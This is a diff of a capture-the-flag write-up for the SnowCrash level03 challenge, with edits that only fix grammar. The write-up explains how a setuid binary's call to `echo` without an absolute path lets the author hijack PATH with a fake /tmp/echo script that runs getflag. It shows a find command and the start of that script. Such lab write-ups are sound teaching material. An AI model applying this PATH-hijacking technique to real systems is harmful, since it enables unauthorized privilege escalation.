mathias-mrsn/snowcrash/level03/README.md

 0x80485e0:	 "/usr/bin/env echo Exploit me"
 ```

-Now I know that the program must have a line like this: `system("/usr/bin/env echo Exploit me")`
+Now I know that the program must have a line like this: `system("/usr/bin/env echo Exploit me")`.

 One more detail I found is that `level03` has `flag03` rights.
 So I need to change the line above to run the `getflag` command.

-This command has a vulnerability because echo isn't called with a absolute path, so we can easily run the command we want with symlink and a PATH variable changed.
+This command has a vulnerability because `echo` isn't called with an absolute path, so we can easily run the command we want with a symlink and a PATH variable changed.

-First I search the getflag executable path.
+First, I search for the `getflag` executable path.
 ```shell
 $ level03@SnowCrash:/tmp$ find / -name "*getflag*" 2>/dev/null
 /bin/getflag
 /rofs/bin/getflag
 ```

-Then I create a file to execute getflag and give full rights to the file.
+Then I create a file to execute `getflag` and give full permissions to the file.
 ```shell
 $ vim /tmp/echo
 #!/bin/bash